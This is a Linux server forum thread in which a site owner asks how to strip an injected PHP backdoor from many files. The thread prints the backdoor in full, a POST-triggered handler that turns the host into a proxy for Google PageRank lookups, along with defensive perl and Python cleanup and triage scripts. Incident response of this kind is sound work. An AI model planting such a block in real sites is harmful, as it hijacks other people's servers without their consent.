LinuxQuestions.org > Forums > Linux Forums > Linux - Server
Linux - Server: This forum is for the discussion of Linux Software used in a server related context.
Old 05-13-2011, 01:58 PM   #1
vandigroup
LQ Newbie
 
Registered: May 2011
Location: San Diego
Posts: 1

Rep: Reputation: 0
Need to remove dynamic string across multiple lines and files.


I know there have been numerous posts on this but I cannot seem to figure out a solution for my dilemma.

My server was hit with an injection script which has placed code across many of my clients files. I need a script that can remove a block of php code that spans multiple lines, multiple directories/files and is dynamic, meaning that part of the code changes. I think using find/sed is what I need but cannot seem to figure out how to get it to work.

The following is the script that is being injected everywhere. The catch is that they have generated dynamic code at the start/end of the script. (I have commented the parts that are dynamically changing on EVERY instance).

PLEASE NOTE: Directly following this script is the start of a valid php script that I do not want to delete.

Code:
<?php
//{{65281980 - DYNAMIC!!

// Guard so the block runs once even when it has been injected into several included files.
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
    $alreadyxxx = 1;
    // Suppress errors so nothing from this block ever shows up in page output.
    $olderrxxx=error_reporting(0);

    // StrToNum/HashURL/CheckHash compute the "ch" checksum that Google's toolbar
    // endpoint expects alongside a PageRank query for a URL.
    function StrToNum($Str, $Check, $Magic)
    {
        $Int32Unit = 4294967296;
        $length = strlen($Str);
        for ($i = 0; $i < $length; $i++) {
            $Check *= $Magic;
            if ($Check >= $Int32Unit) {
                $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
                $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
            }
            $Check += ord($Str{$i});
        }
        return $Check;
    }
    function HashURL($String)
    {
        $Check1 = StrToNum($String, 0x1505, 0x21);
        $Check2 = StrToNum($String, 0, 0x1003F);

        $Check1 >>= 2;
        $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
        $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
        $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

        $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
        $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

        return ($T1 | $T2);
    }

    function CheckHash($Hashnum)
    {
        $CheckByte = 0;
        $Flag = 0;

        $HashStr = sprintf('%u', $Hashnum) ;
        $length = strlen($HashStr);

        for ($i = $length-1; $i >= 0; $i--) {
            $Re = $HashStr{$i};
            if (1 === ($Flag % 2)) {
                $Re += $Re;
                $Re = (int)($Re / 10) + ($Re % 10);
            }
            $CheckByte += $Re;
            $Flag ++;
        }

        $CheckByte %= 10;
        if (0 !== $CheckByte) {
            $CheckByte = 10 - $CheckByte;
            if (1 === ($Flag % 2) ) {
                if (1 === ($CheckByte % 2)) {
                    $CheckByte += 9;
                }
                $CheckByte >>= 1;
            }
        }

        return '7'.$CheckByte.$HashStr;
    }

    // Fetch the PageRank of $url from Google's toolbar endpoint and return it,
    // or -1 if the response contains no "Rank_" field.
    function getpr($url)
    {
        $ch = CheckHash(HashURL($url));
        $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
        $data = file_get_contents($file);
        $pos = strpos($data, "Rank_");
        if($pos === false){return -1;} else{
            $pr=substr($data, $pos + 9);
            $pr=trim($pr);
            $pr=str_replace("\n",'',$pr);
            return $pr;
        }
    }
    // The backdoor: any client that POSTs xxxprch=<url> gets that URL's PageRank
    // echoed back and the script exits before the site's real code runs, so the
    // compromised host acts as an anonymous PageRank-lookup proxy for whoever
    // planted it.
    if(isset($_POST['xxxprch']))
    {
        echo getpr($_POST['xxxprch']);
        exit();
    }
    error_reporting($olderrxxx);
}

//}}459611f4 - DYNAMIC CODE!!
?>

-- START OF VALID CODE - DO NOT DELETE BELOW THIS LINE--

<?php
/**
* @version

Thank you immensely for anyone who can help with this pressing issue. Joe
 
Old 05-14-2011, 12:34 AM   #2
neonsignal
Senior Member
 
Registered: Jan 2005
Location: Melbourne, Australia
Distribution: Debian Buster (Fluxbox WM)
Posts: 1,389
Blog Entries: 52

Rep: Reputation: 359
You can strip out multiline matches using various tools including perl, eg:
Code:
perl -p0777i -e 's/<\?php.*?toolbarqueries.*?\?>//gs' test.html
The '-p0777' turns off the separator so that the whole file will be slurped in. The search and replace looks for the start and end of the php script in the file, using *? so that it minimally matches, otherwise it will match across multiple php scripts. And the 's' on the regular expression is so that the '.' matches will include newline characters. I have used the string 'toolbarqueries' as a signature to try to match only the offending scripts, but it might need to be more specific, as a false match would be bad.

You can then use find to do this across multiple files, eg:
Code:
find . -name \*.html -exec perl -p0777i -e 's/<\?php.*?toolbarqueries.*?\?>//gs' {} \;
Test the command on some sample files before unleashing it on the whole system; there is no undo! It would of course be safer to just restore the damaged files from backups, if this is an option.

Last edited by neonsignal; 05-14-2011 at 12:42 AM.
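A tighter version of the same idea as the perl one-liner above, written as an added example that is not from the thread. Instead of matching from any `<?php` up to the word `toolbarqueries`, it anchors on the `//{{<hex>` and `//}}<hex>` markers that wrap the injected block in the first post (the hex ids are the parts marked DYNAMIC, so they are matched as hex runs rather than literals), refuses to run across a second `<?php`, does a dry run by default, and copies each original outside the web root before overwriting it. The quarantine path `/var/quarantine/injected-php`, the file suffixes scanned and the trimmed sample file are assumptions and constructed input, not anything from the original server.

```python
#!/usr/bin/env python3
"""Remove the injected PageRank-proxy block from a tree of web files (added example)."""
from __future__ import annotations

import re
import shutil
import sys
import tempfile
from pathlib import Path

# Built from the structure of the sample in the first post:
#   <?php //{{<hex id> ... toolbarqueries.google.com ... //}}<hex id> ?>
# (?:(?!<\?php).)*? is a "tempered dot": it cannot run across a second "<?php",
# so legitimate code after the injection is never swallowed even if the closing
# marker is damaged or missing.
INJECT_RE = re.compile(
    r"<\?php\s*//\{\{[0-9a-fA-F]+[^\n]*\n"
    r"(?:(?!<\?php).)*?toolbarqueries\.google\.com(?:(?!<\?php).)*?"
    r"//\}\}[0-9a-fA-F]+[^\n]*\n\s*\?>\s*",
    re.DOTALL,
)

# Constructed sample: a trimmed copy of the injection followed by legitimate code.
SAMPLE_INFECTED = (
    "<?php\n"
    "//{{65281980\n"
    "GLOBAL $alreadyxxx;\n"
    "if($alreadyxxx != 1)\n"
    "{\n"
    "$file = \"http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch\";\n"
    "}\n"
    "//}}459611f4\n"
    "?>\n"
    "\n"
    "<?php\n"
    "/**\n"
    " * @version 1.0\n"
    " */\n"
    "echo 'still here';\n"
)


def strip_injection(text: str) -> tuple[str, int]:
    """Return (cleaned text, number of injected blocks removed)."""
    return INJECT_RE.subn("", text)


def clean_file(path: Path, quarantine: Path | None = None, dry_run: bool = True) -> int:
    """Clean one file in place and return how many blocks it contained.

    In dry-run mode nothing is written. Otherwise the original is copied into
    `quarantine` (outside the web root, so the copy can never be served) first.
    """
    original = path.read_text(encoding="utf-8", errors="surrogateescape")
    cleaned, count = strip_injection(original)
    if count == 0 or dry_run:
        return count
    if quarantine is not None:
        dest = quarantine / path.resolve().relative_to(path.resolve().anchor)
        dest.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(path, dest)
    path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return count


def clean_tree(root: Path, suffixes=(".php", ".html", ".htm"),
               quarantine: Path | None = None, dry_run: bool = True) -> dict[str, int]:
    """Walk `root`; return {relative path: blocks removed} for every file that had the block."""
    hits: dict[str, int] = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in suffixes:
            n = clean_file(p, quarantine, dry_run)
            if n:
                hits[str(p.relative_to(root))] = n
    return hits


def self_check() -> dict:
    """Dry run, then a real run, against a throwaway tree; return what happened."""
    root = Path(tempfile.mkdtemp())
    quarantine = Path(tempfile.mkdtemp())
    (root / "index.php").write_text(SAMPLE_INFECTED)
    (root / "ok.php").write_text("<?php echo 1; ?>\n")
    dry = clean_tree(root, dry_run=True)
    untouched = (root / "index.php").read_text() == SAMPLE_INFECTED
    live = clean_tree(root, quarantine=quarantine, dry_run=False)
    return {
        "dry": dry,
        "untouched_after_dry_run": untouched,
        "live": live,
        "cleaned_head": (root / "index.php").read_text()[:10],
        "quarantined": any(quarantine.rglob("index.php")),
    }


if __name__ == "__main__":
    root = Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    write = "--write" in sys.argv
    quarantine = Path("/var/quarantine/injected-php") if write else None  # assumed location
    for path, n in clean_tree(root, quarantine=quarantine, dry_run=not write).items():
        print(f"{n} block(s) {'removed from' if write else 'found in'} {path}")
```

Run it once without `--write` and read the list of hits before running it again with `--write`; if a hit count is ever greater than 1 for a file, look at that file by hand, since the injection was only ever seen once per file in the thread.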
 
Old 05-15-2011, 12:50 AM   #3
lodragan
LQ Newbie
 
Registered: Jan 2006
Location: USA
Distribution: Slackware 13.1, Windows 7 (on game box only), Mac OSX
Posts: 18

Rep: Reputation: 4
I'm assuming that crackers are modifying your files, and you want to fix the files? Here is how you do it:

1. Disconnect your servers from the internet.

2. Restore all your servers from backups.

3. Fix injection error/bug.

4. Connect servers back to the internet.
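Step 2 overwrites the evidence, so it is worth recording which files carry the block and when they changed before restoring: that window is where the web or FTP logs will show the entry point needed for step 3. The following is an added example, not lodragan's or anything from the thread. It uses the `//{{<hex>` marker plus the `toolbarqueries.google.com` URL from the first post as the signature, sorts hits by ctime (which an unprivileged process cannot set, unlike mtime), and flags files whose mtime has been pushed well behind their ctime, the fingerprint of `touch -r` backdating. The 60-second slack, the file suffixes and the sample tree are assumptions and constructed input.

```python
#!/usr/bin/env python3
"""Timeline the injected files before restoring, to bound the intrusion window (added example)."""
from __future__ import annotations

import os
import re
import sys
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Signature from the block in the first post: the //{{<hex> opening marker followed,
# inside the same block, by the toolbarqueries.google.com URL.
INJECT_MARK = re.compile(rb"//\{\{[0-9a-fA-F]+.*?toolbarqueries\.google\.com", re.DOTALL)

# A file whose ctime is this far ahead of its mtime has had its mtime set by hand
# (touch -r); the threshold is an assumption, not a filesystem rule.
BACKDATE_SLACK_SECONDS = 60


def is_injected(path: Path) -> bool:
    try:
        return INJECT_MARK.search(path.read_bytes()) is not None
    except OSError:
        return False


def triage(root: Path, suffixes=(".php", ".html", ".htm")) -> dict:
    """List infected files with mtime/ctime and the ctime window to search logs in.

    The file owner can set mtime freely, but ctime is written by the kernel and cannot
    be set by an unprivileged user, so the earliest ctime is the trustworthy lower
    bound for when the injection ran.
    """
    files = []
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in suffixes and is_injected(p):
            st = p.stat()
            files.append({
                "path": str(p),
                "mtime": st.st_mtime,
                "ctime": st.st_ctime,
                "backdated": st.st_ctime - st.st_mtime > BACKDATE_SLACK_SECONDS,
            })
    files.sort(key=lambda f: f["ctime"])
    return {
        "files": files,
        "first_ctime": files[0]["ctime"] if files else None,
        "last_ctime": files[-1]["ctime"] if files else None,
    }


def self_check() -> dict:
    """Triage a throwaway tree: two infected files, one of them backdated, one clean."""
    root = Path(tempfile.mkdtemp())
    bad = b"<?php\n//{{65281980\n$f=\"http://toolbarqueries.google.com/\";\n//}}459611f4\n?>\n"
    (root / "a.php").write_bytes(bad)
    (root / "b.html").write_bytes(b"<html>\n" + bad)
    (root / "clean.php").write_bytes(b"<?php echo 1;\n")
    os.utime(root / "a.php", (1000000000, 1000000000))  # mimic `touch -r` backdating
    r = triage(root)
    return {
        "infected": sorted(os.path.basename(f["path"]) for f in r["files"]),
        "backdated": sorted(os.path.basename(f["path"]) for f in r["files"] if f["backdated"]),
        "window_ok": r["first_ctime"] is not None and r["first_ctime"] <= r["last_ctime"],
    }


if __name__ == "__main__":
    r = triage(Path(sys.argv[1] if len(sys.argv) > 1 else "."))
    for f in r["files"]:
        flag = " (mtime backdated)" if f["backdated"] else ""
        when = datetime.fromtimestamp(f["ctime"], timezone.utc)
        print(f"{when:%Y-%m-%d %H:%M:%S}Z {f['path']}{flag}")
    if r["first_ctime"] is not None:
        lo = datetime.fromtimestamp(r["first_ctime"], timezone.utc)
        print(f"search web and FTP logs from {lo:%Y-%m-%d %H:%M:%S}Z onward for the entry point")
```

Run it against the still-infected tree (or a copy taken before the restore) and keep the output with the incident notes; the earliest ctime tells you where to start reading the access and FTP logs for the request or login that wrote the first file.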
 